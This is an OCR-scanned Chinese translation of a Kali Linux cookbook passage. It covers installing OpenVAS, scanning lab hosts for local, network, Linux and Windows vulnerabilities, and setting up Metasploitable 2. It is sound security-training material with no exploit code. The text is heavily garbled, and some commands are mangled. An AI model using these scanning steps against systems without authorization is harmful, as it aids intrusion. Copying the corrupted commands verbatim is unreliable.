Liplaad Targets | Pur eain 





你 会 被 要 求 确认 ， 你 的 测试 将 会 执行 (取决 于 你 选择 了 多 少 目 标 ， 以 及 要 执行 乡 少 测 


试 ) 。 


一 旦 完成 了 ， 你 会 收 到 一 份 报告 ， 它 在 Reports 标签 页 中 。 


双击 报告 来 分 析 下 列 要 点 


o 每 个 发 现 了 漏洞 的 目标 


N 


会 被 列 出 。 


o 双击 IP 地 址 来 观察 端口 ， 和 每 个 端口 的 问题 。 


o 点 击 列 下 方 的 数字 ， 来 获 


o 漏洞 会 详细 列 出 。 


得 所 发 现 的 特定 问题 /漏洞 的 列表 。 


13. a Reports 主 菜单 中 的 Download Report ° 


5.6 4 ^ ft a fo 5 a OpenVAS 


OpenVAS， 即 开放 汤 洞 评估 系统 ， 是 一 个 用 于 评估 目标 源 洞 的 杰出 框架 。 它 是 Nessus 项 目 
的 分 支 。 不 像 Nessus，OpenVAS 提 供 了 完全 免费 的 版 本 。 由 于 OpenVAS 在 Kali Linux 中 成 
为 标准 ， 我 们 将 会 以 配置 开始 。 

准备 


需要 网 络 连接 。 


IRIE Sy Hi 

让 我 们 开始 安装 、 配 置 和 启动 OpenVAS， 首 先 在 终端 窗口 中 访问 它 的 路 径 。 
1. OpenVAS 默认 安装 ， 并 且 只 需要 配置 便于 使 用 。 
2. 在 终端 窗口 中 ， 将 路 径 变 为 OpenVAS 的 路 径 : 


cd /usr/share/openvas 


3， 执 行 下 列 命 令 : 


openvas-mkcert 


这 一 步 我 们 为 OpenVAS 创建 了 SSL 证 书 。 

i 保留 CA 的 默认 生命 周期 。 

ij， 更 新 证 书 的 生命 周期 ， 来 匹配 CA 证 书 的 天 数 : 1460 © 
iii， 输入 国家 或 地 区 。 

iv. 输入 州 或 省 。 

v. 组织 名 称 保留 默认 。 


vi， 你 会 看 到 证 书 确认 界面 ， 之 后 按 下 回 车 键 来 退出 。 


Congratulations. Your server certificate was properly created. 


The following Tiles were created: 


Certification authority: 
Ce rt i f i ca t a = / var / 1 i b F 0 p eanvas; Fi C À Vic 
Private key = /var/Lib/openvas/priv 


UpenVAS Server 
Certificate = /var/lib/openvas/CA/si 
Private key = /var/lib/ 'openvas/priva 'CA/ PVT ndi 


ress [ENTER] to exit 





执行 下 列 命令 : 


openvas-nvt-sync 


六 会 将 OpenVAS NVT 数据 库 和 当前 的 NVT 版 本 同步 。 也 会 更 新 到 最 新 的 漏洞 检查 。 


root@kali:/usr/sbin# openy 

[ij This script synchronizes an NVT collection with the ‘UpenVAS NVI Feed, 

[1] The ‘OpenVAS NVI Feed is provided by [he PET iie 

[il Online information about this feed: 'http://w 

.html' 

| NVT dir: /var/Lib/openvas/plugins 
rsync is not recommended for the initial sync. Falling back on http. 
Will use wget 


[1] Using GNU wget: /usr/bin/wget 

[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt -feed-current.ta 
r.bz2 

[i] Downloading to: /tmp/opaenvas-nvt-sync.PAPfDzxPdE/openvas-feed-2013-06-26-831 
6.tar.bz2 

--#913-06-26 23:23:02 nttp://www.openvas.org/openvas-nvt -Teed-current .tar.bz2 
Resolving www .openvas.org (www.openvas.org)... oe. 186 





执行 下 列 命令 


openvas-mkcert-client -n om -i 
openvasmd -rebuild 


这 会 生成 穴 户 证 书 并 分 别 重 构 数据 库 。 
执行 下 列 命令 : 


openvassd 


48 3l OpenVAS 扫描 器 并 加 载 所 有 插件 (大 约 26406 ^^) ， 所 以 会 花 一 些 时 间 。 


T. JA TAA: 


openvasmd --rebuild 
openvasmd --backup 


8 执行 下 列 命令 来 创建 你 的 管理 员 用 户 (我 们 使 用 openvasadmin ) 


openvasad -c ‘add_user' -n openvasadmin -r admin 


root@kali:-# openvasad -c ‘add user' -n admin -r Admin 
Enter password: 
ad main :MESSAGE :3123:2013-66-36 17h55,.23 EDT: No rules file provided, © 


no restrictions. 
ad main:MESSAGE :3123:20] Q 17055.23 EDT: User admin has been successfully 


root@kali:-# i 





9. dT: 
openvas-adduser 
这 会 让 你 创建 普通 用 户 
i 输入 登录 名 称 。 


ii， 在 校 验 请 求 上 按 下 回 车 键 (这 会 自动 选择 密码 ) e 


Nn 


iii, 43A PRR BAW o 
iV， 对 于 规则 ， 按 下 ctrl +d ° 


V. dE Y 来 添加 用 户 。 


rool@kali:=# openvas-adduser 
Using /var/tmp as a temporary file holder. 


a new openvassd user 


Login : wlp 
Authentication (pass/cert) 


Login password 


openvassa nas a rules stem which allows you to restrict the hosts that wlp has the right to 


For instance, you may want him to be able to scan his own host only. 


Please see the openvas-adduser[(8) man page for the rules syntax. 


r the rules for this user, and hit ctrl-D once you are done: 
ye user can have an empty rules set) 





10. 执行 下 列 命令 来 配置 OpenVAS 的 交互 端口 : 


第 五 章 漏洞 评估 


openvasmd -p 9390 -a 127.0.0.1 
openvasad -a 127.0.0.1 -p 9393 
gsad --http-only --listen-127.0.0.1 -p 9392 


9392 是 用 于 Web 浏览 器 的 推荐 端口 ， 但 是 你 可 以 自己 选择 。 


11. 访问 http://127.0.0.1:9392， 在 你 的 浏览 器 中 查看 OpenVAS 的 Web 界面 。 


Greenbone Security Assistant 








gie | 和 了 和 


a 





Successfully logged out. 
Username 


Password 





工作 原理 
在 这 个 秘籍 中 ， 我 们 以 打开 终端 究 口 并 通过 仓库 安装 OpenVAS 。 之 后 我 们 创建 了 一 个 
证 书 并 安装 我 们 的 插件 数据 库 。 然 后 ， 我 们 创建 了 一 个 管理 员 和 一 个 首 通用 户 账号 。 最 后 ， 


我 们 启动 了 OpenVAS 的 Web 界面 并 展示 了 登录 界面 。 


每 次 你 在 OpenVAS 中 执行 操作 的 时 候 ， 你 都 需要 重建 数据 库 。 


更 多 
一 节 展 示 了 除了 启动 OpenVAS 之 外 的 一 些 附 加 信息 
编写 SSH 脚本 来 尼 动 OpenVAS 
每 次 你 打算 启动 OpenVAS 的 时 候 ， 你 需要 : 
1. 同步 NVT 版 本 《这 非常 不 错 ， 因 为 这 些 项 目 会 在 新 漏洞 发 现 的 时 候 更 改 ) © 


100 


2. J& 8j OpenVAS H Rg o 


， 重 建 数据 库 。 


CD 


4. 备份 数据 库 。 
5. 配置 你 的 端口 o 


为 了 节省 时 间 ， 下 面 的 简单 Bash 脚本 可 以 让 你 启动 OpenVAS。 把 文件 保存 为 openvAs,sh > 
并 放 在 你 的 /root 文件 夹 中 : 


#!/bin/bash 

openvas-nvt-sync 

openvassd 

openvasmd --rebuild 

openvasmd --backup 

openvasmd -p 9390 -a 127.0.0.1 

openvasad -a 127.0.0.1 -p 9393 

gsad --http-only --listen-127.0.0.1 -p 9392 


使 用 OpenVAS x @ 
你 可 以 选择 通过 OpenVAS do RAITH F] YFKE o OpenVAS X t —4* GUI 应 用 。 为 了 局 动 
这 个 应 用 : 


1. Æ Kali Linux 的 桌面 的 启动 菜单 中 ， 访 
站 Applications | Kali Linux | Vulnerability Assessment | Vulnerability Scanners | Oper 


> 就 像 下 面 展 示 的 那样 : 


























Please enter address and 
User account for y Our [lan 
regime 


lf you select one of the 


profiles, you only need to Serveraddress Port 


enter the password. 


Before you press the log in 


button you may store the | | | 9390 | 


access profile. 


Note, that the scan engine 

must have OMP support Username 
enabled for the given port 

for a successful connection. 





2， 将 服务 器 地 址 输入 为 127.0.0.1 ° 
3. 输入 你 的 用 户 名 。 
4. 输入 你 的 密码 。 


5. it Log in 按钮 。 


5.7 OpenVAS - 发 现 本 地 漏洞 


OpenVAS 允许 我 们 攻击 很 多 种 类 的 漏洞 ， 它 们 取决 于 我 们 的 版 本 。 我 们 也 需要 评估 的 目标 沁 
洞 列 表 限 制 为 针对 我 们 想 要 获取 的 信息 类 型 的 漏洞 。 在 这 个 秘籍 中 ， 我 们 将 要 使 用 OpenVAS 
扫描 目标 上 的 本 地 漏洞 ， 这 些 漏 洞 针 对 我 们 当前 的 本 地 主机 。 
操作 步骤 
让 我 们 以 使 用 OpenVAS 发 现 本 地 漏洞 开始 ， 首 先 打 开 Firefox 2 95 25: 

1. 访问 http://127.0.0.1:9392 并 登陆 OpenVAS ° 


2， 仿 问 Configuration | Scan Configs ° 


O Configuration 
o Scan Configs 
o Targets 
o Credentials 
o Agents 
o Escalators 
o Schedules 
o Report Formats 
o Slaves 


输入 扫描 的 名 称 。 这 个 秘籍 中 ， 我 们 使 用 Local vulnerabilities ° 


我 们 选择 Empty, static and fast 选项 。 这 个 选项 可 以 让 我 们 从 零 开 始 并 创建 我 们 自己 的 
配置 。 


点 击 Create Scan Config 


| New Scan Config kl 





Name Local Vulnerabilities 
Comment (optional) 


9€ Empty, static and fast 
Base PT 


2 Full and fast 




















| Create Scan Config | | 


我 们 现在 打算 编辑 我 们 的 扫描 配置 。 点 击 Local vulnerabilities 旁边 的 扳手 图 标 。 


| Local Vulnerabilities 15 zd 185014 & EEUU 
按 下 ctrl F 并 在 查找 框 中 输入 Local 。 


对 于 每 个 找到 的 本 地 族 ， 点 击 select all NVT's 框 中 的 复 选 框 。 族 是 一 组 漏洞 。 选 择 的 
漏洞 为 : 


oO Compliance 

oO Credentials 

o Default Accounts 
O Denial of Service 
O FTP 


oO Ubuntu Local Security Checks 


10. 


11. 


12. 


13. 


— Management 


o Tasks 


o New Task 
o Notes 


a Overrides 

o Performance 
IG Configuration 

o Scan Configs 


o Targets 
o Credentials 
o Agents 


E 


Scalators 


o Schedules 
o Report Formats 
o Slaves 

G Administration 





























| Name: 
Comment: 


Edit Network Vulnerability Test Families 


NVT's selected or = 


shcon 


Edit Scan C onfig Details v 





Family @ ro 


AIX Local Security Checks 


Brute force attacks 

Buffer overflow 

CISCO 

CentOS Local Security Checks 
Compliance 

Credentials 

Databases 

Debian Local Security Checks 
Default Accounts 

Dental of Service 


FTP 


点 击 Save Config ° 


i? le] Configuration | Targets 


G Configuration 
o Scan Configs 


o Targets 

o Credentials 
o Agents 

o Escalators 


o Schedules 
o Report Formats 
o Slaves 


创建 新 的 目标 并 执行 下 列 操 作 : 


输入 目标 名 称 
输入 主机 ， 通 


输入 唯一 


a 输入 多 个 地 址 ， 以 逗号 分 隔 : 


m 输入 地 址 范 


Oo 


Local Vulnerabilities 


1 of 1 

0 of 11 

0 of 434 

0 af 4 

1243 of 1243 
ü of 3 

ü af 2 

O of 71 

2476 of 2476 
D of 28 

D of 777 


D of 159 


S DX ee 
的 地 址 : 192.168.0.10 


点 击 Create Target ° 


现在 选 


先 择 Scan Management | New Task 


输入 任务 名 称 


输入 注释 (可 选 


Oo 


) 。 


> 并 执行 下 列 


192.168.0.10, 192.166.0115 


> 192.168.0.1-20 


操作 : 


Cd 二 后 
ee 
El e D 
Gd @ Gd 
加 a 
aec 
ez 
Ld 9 ad 
Ge a 
aec 
ge 


$e 





ijij， 和 选择 你 的 扫描 配置 。 这 里 是 Local Vulnerabilities ° 
iV， 和 选择 扫 描 目 标 。 这 里 是 Local Network ° 


所 有 其 他 选项 保留 默认 。 


~ 


Vi， 点 击 Create Task ° 


New Task ? 





Mame Local Vulnerabilities 
Comment (optional) 

Scan Config ‘Local Vulnerabilities | + 
Scan Targets Local Network = 

Escalator (optional) = * 

Schedule (optional) — + 

Slave (optional) 一 - 


[ Create Task | 


14. 现在 访问 Scan Management | Tasks 。 


15. Mardi Fd ade sa o KBE Local Vulnerability Scan 


Results of last operation 





(Operation: Delete Task 
(Status code: 200 
Status message: OK 


Tasks TW Wo auto-refresh - ‘Apply ovemdes = 


T ee 
| Task *W | Status lo Threat Trend | Actions 
| dalli | 


| Local Vulnerabilities Scan Aug a 2012 Mone Li EE 加 








工作 原理 


这 个 秘籍 中 ， 我 们 启动 OpenVAS 并 登入 它 的 Web 界面 。 之 后 我 们 配置 了 OpenVAS 来 搜索 
一 系列 本 地 漏洞 。 最 后 ， 我 们 选择 了 目标 并 完成 了 扫描 。OpenVAS 之 后 扫描 了 目标 系统 上 已 
知 漏洞 ， 包 括 我 们 的 NVT 版本。 

更 多 
一 旦 执行 了 扫描 ， 你 可 以 通过 查看 报告 来 观 宗 结果 : 
1. le] Scan Management | Tasks ° 


2. i Local Vulnerabilities Scan Ž W 8] ZR KA E : 


Results of last operation 





| Operation: Delete Task 
Status code: 200 
Status message: OK 





Tasks T * "Mo avio-reiresh + “Apply ovemdes + 


Task | Ma Status ie ie ! | Threat Trend | Actions 


| Local Vulnerabilities Scan — L5. 5 Aug 82012 None 





3 点击 下 载 箭头 来 查看 报告 : 


m5 





Task Summary 


Name: Local Vulnerabilities Scan Back to Tasks 


Comment: 

Config: Full and f 
Escalator: 

Schedule: (Next due: over) 
Target: Localhost 
Slave: 

Status: — MEL. NN 
Reports: 1 (Finished: 1) 






Reports for "Local Vulnerabilities Scan" z 


Scan Results 
d ‘brent |scanmests UU 
一 | 


S P :46:07 2012 1 1 13 o Bag 









Notes on Results of "Local Vulnerabilities Scan" "S 


Overrides on Results of "Local Vulnerabilities Scan" | & 


wr [rom [re rea Actions 





5.8 OpenVAS - 发 现 网 络 漏洞 


在 这 个 秘籍 中 ， 我 们 将 要 使 用 OpenVAS 扫描 目标 上 的 网 络 漏洞 ， 这 些 漏洞 针对 我 们 目标 网 络 
上 的 设备 。 


准备 
为 了 完成 这 个 秘籍 ， 你 需要 被 测试 的 虚拟 机 。 


e Windows XP 


e Windows 7 
e Metasploitable 2.0 
e 其 它 版 本 的 Linux 


操作 步骤 
让 我 们 以 使 用 OpenVAS 发 现 网 络 漏洞 开始 ， 首 先 打 开 Firefox 浏览 器 : 
1. 访问 http://127.0.0.1:9392 并 登陆 OpenVAS ° 


2. tle] Configuration | Scan Configs ° 


B Configuration 
o Scan Configs c— | 
o Targets 
o Credentials 
o Agents 
o Escalators 
o Schedules 
o Report Formats 
o Slaves 


3. 输入 扫描 的 名 称 。 这 个 秘籍 中 ， 我 们 使 用 Network vulnerabilities ° 


4. 我 们 选择 Empty, static and fast 选项 。 这 个 选项 可 以 让 我 们 从 零 开 始 并 创建 我 们 目 己 的 
配置 。 


5. «at Create Scan Config 


New Scan Config F 





Name Local Vulnerabilities 


Comment (optional) 


® Empty, static and fast 
- Full and fast 


Base 


Create Scan Config | 


6， 我 们 现在 打算 编辑 我 们 的 扫描 配置 。 点 击 Network Vulnerabilities 32 824&R FATE ° 
T. d F ctrl + F 并 在 查找 框 中 输入 Network ° 


8， 对 于 每 个 找到 的 族 ， 点 击 select all NVT's 框 中 的 复 选 框 。 族 是 一 组 漏洞 。 选 择 的 漏洞 
为 : 


O Brute force attacks 
O Buffer overflow 


oO CISCO 


Compliance 
Credentials 
Databases 

Default Accounts 
Denial of Service 
FTP 

Finger abuses 
Firewalls 

Gain a shell remotely 
General 

Malware 

Netware 

NMAP NSE 
Peer-To-Peer File Sharing 
Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Problems 

SNMP 

Service detection 
Settings 


Wireless services 





Edit Scan Config Details T 





Name: Network 
Comment: 


Edit Network Vulnerability Test Families 





AIX Local Security Checks 0 of 1 aia 图 
Brute force attacks 0 of 11 peg 加 
Buffer overflow 0 of 333 "Lo ri 
CISCO 0 of 4 amo 
CentOS Local Security Checks 0 of 669 7 aa Fa 
Compliance 0 of 3 eto Ei 
Credentials 0 of 2 "Lo 7| 
Databases 0 of 52 e Eo [| 
Debian Local Security Checks 0 of 2189 sa [v] y^ 
Default Accounts 0 of 20 eDoÓp Ei 
Denial of Service 0 of 619 sia 区 v^ 
FTP 0 of 142 emo Fa 


9. Aix Save Config ° 
10. 访问 configuration | Targets 
G Configuration 
o Scan Configs 
o Targets €— 


o Credentials 


o Agents 

o Escalators 

o Schedules 

o Report Formats 
o Slaves 


11. 创建 新 的 目标 并 执行 下 列 操作 : 
i， 输 入 目标 名 称 。 
ij、 输入 主机 ， 通 过 下 列 方 式 之 一 : 
a 输入 唯一 的 地 址 : 192.168.0.10 
m 输入 多 个 地 址 ， 以 过 号 分 隔 : 192.168.0.10,192.168.0.115 
m 输入 地 址 学 围 : 192.168.0.1-20 


12. 点 击 Create Target ° 
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13. 现在 选择 scan Management | New Task ， 并 执行 下 列 操作 : 
i 输入 任务 名 称 。 
i 输入 注释 (TH) © 
ii， 选 择 你 的 扫描 配置 。 这 里 是 Network Vulnerabilities ° 
iv. 选择 扫描 目标 。 这 里 走 Local Network ° 
v. 所 有 其 他 选项 保留 默认 。 


vi. Aa Create Task ° 


New Task kd 





Name Network Vulnerabilities 


Comment (optional) 


Scan Config NMatwark d 
Scan Targets Local Network = 

Escalator (optional) -- = 

Schedule (optional) -- * 

Slave (optional) =~. 


Create Task | 


14. 现在 访问 scan Management | Tasks ° 


15. 点击 扫描 穷 边 的 播放 按钮 。 这 里 是 Network Vulnerability Scan 


工作 原理 


这 个 秘籍 中 ， 我 们 启动 OpenVAS 并 登入 它 的 Web 界面 。 之 后 我 们 配置 了 OpenVAS 来 搜索 
一 系列 网 络 汤 洞 。 最 后 ， 我 们 选择 了 目标 并 完成 了 扫描 。OpenVAS 之 后 扫描 了 目标 系统 上 已 
知 漏 洞 ， 包 括 我 们 的 NVT 版本。 

更 多 
一 旦 执行 了 扫描 ， 你 可 以 通过 查看 报告 来 观 伦 结果 : 

1. 1% 1*] Scan Management | Tasks ° 

2. it Network Vulnerabilities Scan ar i 8 2X 86 A tk i 


3， 点 击 下 载 前 头 来 查看 报告 : 





Task Summary A S | | bt. 
Name: Windows Scan Back to Tasks 
Comment: 
Config: Windows Vulnerabilities 
Escalator: 
Schedule: (Next due: over) 
Target: Local Network 
Slave: 
Status: Dione 
Reports: 1 (Finished: 1) 











Wed Dec 5 15:48:34 2012 
Done 





=; 
Overrides on Results of “Windows Scan" Er 





5.9 OpenVAS - 发 现 Linux 特定 漏洞 


在 这 个 秘籍 中 ， 我 们 将 要 使 用 OpenVAS 扫描 Linux 漏洞 ， 这 些 漏 洞 针 对 我 们 目标 网 络 上 的 
Linux 主机 。 


准备 
为 了 完成 这 个 秘籍 ， 你 需要 被 测试 的 虚拟 机 。 


e Metasploitable 2.0 
e 其 它 版 本 的 Linux 


TRE y HR 
让 我 们 以 使 用 OpenVAS X 3L Linux 特定 漏洞 开始 ， 首 先 打 开 Firefox 浏览 器 : 
1. 访问 http:/127.0.0.1:9392 并 登陆 OpenVAS ° 


2. tle] Configuration | Scan Configs ° 


Configuration 
o Scan Configs 《一 
o Targets 
o Credentials 
o Agents 
o Escalators 
o Schedules 
o Report Formats 
o Slaves 





输入 扫描 的 名 称 。 这 个 秘籍 中 d 我 们 使 用 Linux Vulnerabilities ° 


我 们 选择 Empty, static and fast 选项 。 这 个 选项 可 以 让 我 们 从 零 开 始 并 创建 我 们 自己 的 
配置 。 


点 击 Create Scan Config 


New Scan Config F 





Name Linux Vulnerabilities 


Comment (optional) 


© Empty, static and fast 
Full and fast 


Base 


| Create Scan Config | 











我 们 现在 打算 编辑 我 们 的 扫描 配置 。 点 击 Linux vulnerabilities 旁边 的 扳手 图 标 。 
按 下 ctrl + F 并 在 查找 框 中 输入 Linux ° 


对 于 每 个 找到 的 族 ， 点 击 select all NVT's 框 中 的 复 选 框 。 族 是 一 组 漏洞 。 选 择 的 漏洞 
2g $ 


O Brute force attacks 
o Buffer overflow 

oO Compliance 

o Credentials 

O Databases 

o Default Accounts 

O Denial of Service 

O FTP 

o Finger abuses 

o Gain a shell remotely 
O General 

oO Malware 


O Netware 


10. 


11. 


12. 


13. 























NMAP NSE 

Port Scanners 
Privilege Escalation 
Product Detection 
RPC 

Remote File Access 
SMTP Problems 

SNMP 

Service detection 
Settings 

Wireless services 


Web Server 


O Configuration 


o Scan Configs 

o Targets €— 
o Credentials 

o Agents 

o Escalators 

o Schedules 

o Report Formats 
o Slaves 


点 击 Save Config ° 


i$ le] Configuration | Targets 


创建 新 的 目标 并 执行 下 列 操作 : 


输入 目标 名 称 。 
输入 主机 ， 通 过 下 列 方式 之 一 : 
m 输入 唯一 的 地 址 : 192.168.0.10 
m 输入 多 个 地 址 ， 以 各 号 分 隔 : 192.168.0.10,192.168.0.115 


m 输入 地 址 范围 : 192.168.0.1-20 


点 击 Create Target ° 


现在 选择 Scan Management | New Task ， 并 执行 下 列 操作 : 


输入 任务 名 称 。 
输入 注释 (可 选 ) 。 


选择 你 的 扫描 配置 。 这 里 是 Linux vulnerabilities 。 


iV， 选 择 扫 描 目 标 。 这 里 是 Local Network ° 
v. 所 有 其 他 选项 保留 默认 。 


Vi. Aa Create Task ° 


New Task 7 





Name Linux Scan 


Comment (optional) 


Scan Config Linux Vulnerabilities - 
Scan Targets Local Network = 

Escalator (optional) — * 

Schedule (optional) = = 

Slave (optional) = + 





_ Create Task | 


14. 现在 访问 Scan Management | Tasks ° 


15. &ddadeinü)4Saxdk4n o KBE Linux Vulnerability Scan 


工作 原理 


这 个 秘籍 中 ， 我 们 启动 OpenVAS 并 登入 它 的 Web 界面 。 之 后 我 们 配置 了 OpenVAS 来 搜索 
一 系列 Linux 漏洞 。 最 后 ， 我 们 选择 了 目标 并 完成 了 扫描 。OpenVAS 之 后 扫描 了 目标 系统 上 
已 知 漏洞 ， 包 括 我 们 的 NVT 版 本 。 


Z 
RG 
一 旦 执行 了 扫描 ， 你 可 以 通过 查看 报告 来 观察 结果 : 
1. 1% 1*] Scan Management | Tasks ° 


2. 点击 Linux Vulnerabilities Scan 432 8] ZA KA E : 


3， 点 击 下 载 前 头 来 查看 报告 : 


| Navigation | Edit Scan Config Details @ 








(B Scan Management Back to Confias 
| o Tasks Name: Linux Vulnerabilities 
o New Task Comment: 
o Notes = a= "wg 
o Overrides Edit Network Vulnerability Test Families 
o Performance ' = 
^ — II Cr CT 
o Scan Configs AIX Local Security Checks 0of1 
o Targets 
o Credentials Brute force attacks 0 of 11 a - : m 
a Agents Buffer overflow 0 of 333 eo v^ 
o Escalators i 
CISCO 0 of 4 
o Schedules : ee E 
o Report Formats CentOS Local Security Checks 0 of 669 ne Pa 
Slaves 
| 要 Compliance 0 of 3 "0o ~ 
|O Administration 
o Users Credentials 0 of 2 Ed mod Fa 
o NVT Feed Databases 0 of 52 eM Fal 
o Settings | 
la Help Debian Local Security Checks 0 of 2189 I? ta | v^ 
| oLontents Default Accounts o of 20 enc us 
o About 
— M - | Denial of Service ü of 619 aha Fad 
FTP 0 of 142 sDog a 


5.10 OpenVAS - 发现 Windows 特定 漏洞 

在 这 个 秘籍 中 ， 我 们 将 要 使 用 OpenVAS 扫描 Windows 漏洞 ， 这 些 漏洞 针对 我 们 目标 网 络 上 
的 Windows i ° 

准备 

为 了 完成 这 个 秘籍 ， 你 需要 被 测试 的 虚拟 机 。 


e Windows XP 
e Windows 7 


Te TE YR 
让 我 们 以 使 用 OpenVAS RIL Windows 特定 漏洞 开始 ， 首 先 打 开 Firefox 浏览 器 : 
1. 访问 http:/127.0.0.1:9392 并 登陆 OpenVAS ° 
2， 仿 问 Configuration | Scan Configs ° 
O Configuration 
o Scan Configs c 


o Targets 
o Credentials 


o Agents 
o Escalators 
o Schedules 





输入 扫描 的 名 称 。 这 个 秘籍 中 ， 我 们 使 用 windows Vulnerabilities ° 


我 们 选择 Empty, static and fast 选项 。 这 个 选项 可 以 让 我 们 从 零 开 始 并 创建 我 们 自己 的 
配置 。 


点 击 Create Scan Config 


? 





New Scan Config = 


Name Windows Vulnerabilities 


Comment (optional) 


© Empty, static and fast 
' Full and fast 


Base 


| Create Scan Config | 


我 们 现在 打算 编辑 我 们 的 扫描 配置 。 点 击 windows Vulnerabilities x32 824A F B d ° 
按 下 ctrl F 并 在 查找 框 中 输入 windows ° 


对 于 每 个 找到 的 族 ， 点 击 select all NVT's 框 中 的 复 选 框 。 族 是 一 组 漏洞 。 选 择 的 漏洞 
20$ 


O Brute force attacks 
o Buffer overflow 

o Compliance 

oO Credentials 

oO Databases 

O Default Accounts 

O Denial of Service 

O FTP 

o Gain a shell remotely 
o General 

o Malware 

O NMAP NSE 

© Port Scanners 

o Privilege Escalation 
O Product Detection 

O RPC 

O Remote File Access 
O SMTP Problems 

O SNMP 

O Service detection 

O Web Server 


O Windows 


O Windows: Microsoft Bulletins 


| Edit Scan Config Details 7 





| Name: Windows Vulnerabilities 
Comment: 





f Family © OE i NVT's selected Select all NVT's 
| "| 


AIX Local Security Checks 0 of 1 Oan 
| Brute force attacks 0 of 11 2o | 
Buffer overflow 0 of 333 1 Gl- Fal 
CISCO 0 of 4 te ] 
| CentOS Local Security Checks 0 of 669 Bet F 
Compliance 0 of 3 1 Gl- 7] 
Credentials 0 of 2 a 四 F] 
| Databases 0 of 52 bd © ad vi td 
| Debian Local Security Checks D of 2189 Ed a Ga Pa 
| Default Accounts D of 20 2052 Fj Fa 
Denial of Service 0 of 619 e Elo y 
| FTP D of 142 Ld a E al Ea 


9. Aix Save Config ° 


10. 访问 Configuration | Targets 


New Task ? 





Name Windows Scan 
Comment (optional) 
Scan Contig Windows Vulnerabilities T 
Scan Targets Local Network * 
Escalator (optional) = + 
Schedule (optional) — ~ 


Slave (optional) = 








11. 创建 新 的 目标 并 执行 下 列 操作 : 
i, 输入 目标 名 称 。 
ij、 输入 主机 ， 通 过 下 列 方式 之 一 : 
m 输入 唯一 的 地 址 192.168.0.10 
m 输入 多 个 地 址 ， 以 各 号 分 隔 : 192.168.0.10,192.168.0.115 


m 输入 地 址 范围 : 192.168.0.1-20 


12. 点 击 Create Target 。 
13. 现在 选择 scan Management | New Task ， 并 执行 下 列 操作 : 
i 输入 任务 名 称 。 
i 输入 注释 (TA) © 
ij， 选择 你 的 扫描 配置 。 这 里 是 windows Vulnerabilities ° 
iV， 选 择 扫 描 目 标 。 这 里 是 Local Network ° 
v. 所 有 其 他 选项 保留 默认 。 
vi. Š Create Task ° 
O Configuration 
o Scan Configs 
o Targets 
o Credentials 
o Agents 
o Escalators 
o Schedules 


o Report Formats 
o Slaves 


14. 现在 访问 Scan Management | Tasks ° 


15. 点击 扫描 穷 边 的 播放 按钮 。 这 里 是 windows Vulnerability Scan 


工作 原理 


这 个 秘籍 中 ， 我 们 启动 OpenVAS 并 登入 它 的 Web 界面 。 之 后 我 们 配置 了 OpenVAS 来 搜索 
一 系列 Windows 漏洞 。 最 后 ， 我 们 选择 了 目标 并 完成 了 扫描 。OpenVAS 之 后 扫描 了 目标 系 
统 上 已 知 漏洞 ， 包 括 我 们 的 NVT 版 本 。 
更 多 
一 旦 执行 了 扫描 ， 你 可 以 通过 查看 报告 来 观 公 结 果 : 

1. le] Scan Management | Tasks ° 

2. Xi Windows Vulnerabilities Scan ar ib 8 2X 8t A tk 。 


3 点 击 下 载 箭头 来 查看 报告 : 


第 五 章 漏洞 评估 





Navigation Edit Scan Config Details 7 
G Scan Management | Back to Confias 
o Tasks | Name: Linux Vulnerabilities 
o New Task Comment: 
5 Notes 
o Overrides Edit Network Vulnerability Test Families 


fe |: 
ao Ta 


G Configuration |Family @ Hos NNT s selected saccus monavie 
7 7 
























































o Scan Configs | AIX Local Security Checks 0 of 1 De 
ei | Brute force attacks 0 of 11 Uci 
a Agents Buffer overflow 0 of 333 205 可 Fa 
PENE | | CISCO 0 of 4 Be] 
o Report Formats CentOS Local Security Checks 0 of 669 ne [F] 
Wohnen | Compliance 0 of 3 205g à 
o Users Credentials 0 of 2 eo | 
| Databases 0 of 52 ae | 
Gitelp Debian Local Security Checks 0 of 2189 anci 
o Contents Default Accounts 0 of 20 而 四 名 加 F is 
er Denial of Service 0 of 619 emo F] Pal 
| Fp 0 of 142 «Do al 
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第 六 章 漏洞 利用 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


一 院 我 们 完成 了 漏洞 扫描 步骤 ， 我 们 就 了 解 了 必要 的 知识 来 尝试 利 用 目标 系统 上 的 漏洞 。 这 
一 章 中 ， 我 们 会 使 用 不 同 的 工具 来 操作 ， 包 括 系统 测试 的 瑞士 军刀 Metasploit。 


6.1 z% F ie á Metasploitable 


这 个 秘籍 中 ， 我 们 会 安装 、 配 置 和 局 动 Metasploitable 2。 Metasploitable 是 基于 Linux 的 操 
作 系 统 ， 拥 有 多 种 可 被 Metasploit 攻击 的 漏洞 。 它 由 Rapid7 (Metasploit 框架 的 所 有 者 ) 设 
计 。Metasploitable 是 个 熟悉 Meterpreter 用 法 的 极 好 方式 。 
准备 
为 了 执行 这 个 秘籍 ， 我 们 需要 下 列 东西 

e 互联 网 连接 

e VirtualBox PC 上 的 可 用 空间 


e 解压 缩 工具 (这 里 我 们 使 用 Windows 上 的 7-Zip) 


让 我 们 开始 下 载 Metasploitable 2 » 3x 3&4 5647 36 4$ ;€ SourceForge 获取 下 载 包 : 


1， 从 过 个 链接 下 载 Metasploitable 2 : <http://sourceforge.net/ 
projects/metasploitable/files/Metasploitable2/> » 


2. HH ELIE | 88 EAR Ma a © 
3. 解压 文件 。 
4. 将 文件 夹 内 容 放 到 你 储存 虚拟 磁盘 文件 的 位 置 。 


5. 477 VirtualBox 并 点 击 New 按钮 : 


























6. 


Welcome to the New Virtual Machine Wizard! 


This wizard will guide you through the steps that are necessary to create a new virtual machine for VirtualBox. 


Use the Next button to go to the next page of the wizard and the Back button to return to the previous page. You | 
can also press Cancel if you want to cancel the execution of this wizard. 





7. 输入 Metasploitable 2 的 名 称 并 将 operating System: 选择 为 Linux * version: 选 
项 Ubuntu 。 像 下 面 的 截图 那样 点 击 Next 。 





VM Name and OS Type 


Enter a name for the new virtual machine and select the type of the guest operating system you plan to install onto 
the virtual machine. 


The name of the virtual machine usually indicates its software and hardware configuration. It will be used by all 
VirtualBox components to identify your virtual machine. 





8， 如 果 可 用 的 话 ， 选 择 512 MB ， 并 点 击 Next o 
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Select the amount of base memory (RAM) in megabytes to be allocated to the virtual machine, 
The recommended base memory size is 512 MB. 
Base Memory Size 


512 MB 


